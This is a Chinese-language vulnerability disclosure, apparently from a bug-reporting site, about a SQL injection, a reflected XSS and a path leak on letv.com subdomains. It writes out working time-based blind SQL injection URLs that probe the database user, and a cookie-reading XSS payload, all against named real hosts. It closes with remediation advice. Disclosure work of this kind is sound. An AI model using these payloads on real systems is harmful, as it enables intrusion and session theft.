注射点位于(参数ID): http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=1&_=1408792945702 反射型XSS位于: http://address.shop.letv.com/api/web/insert/insUserAddress.jsonp?callback=callback__%3Cimg%20src=aaaa%20onerror=alert(document.cookie)%3E& 绝对路径泄漏位于: http://joyearcars2014happy.hz.letv.com/php/joyearcar.php?callback=aaaa&username= Notice: Undefined index: tel in /letv/joyearcars2014happy.hz.letv.com/php/joyearcar.php on line 11 测试过程http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(length(user())>22,sleep(1),0)&_=1408792945702 可猜解当前连接用户的长度为23。 我只猜解了第一个字母的ASCII码为50,字母“2”: http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(ascii(mid(user(),1,1))=50,sleep(1),2)–&_=1408792945702 非root,未进一步利用。
修复方案:解决SQL注射 编码callback 不显示详细错误信息 |
-
上一篇: U-Mail邮件服务系统最新版SQL注入漏洞 – 网站安全
下一篇: phpyun设计缺陷可用别的账户money付款,清空别的账
评论前必须登录!
立即登录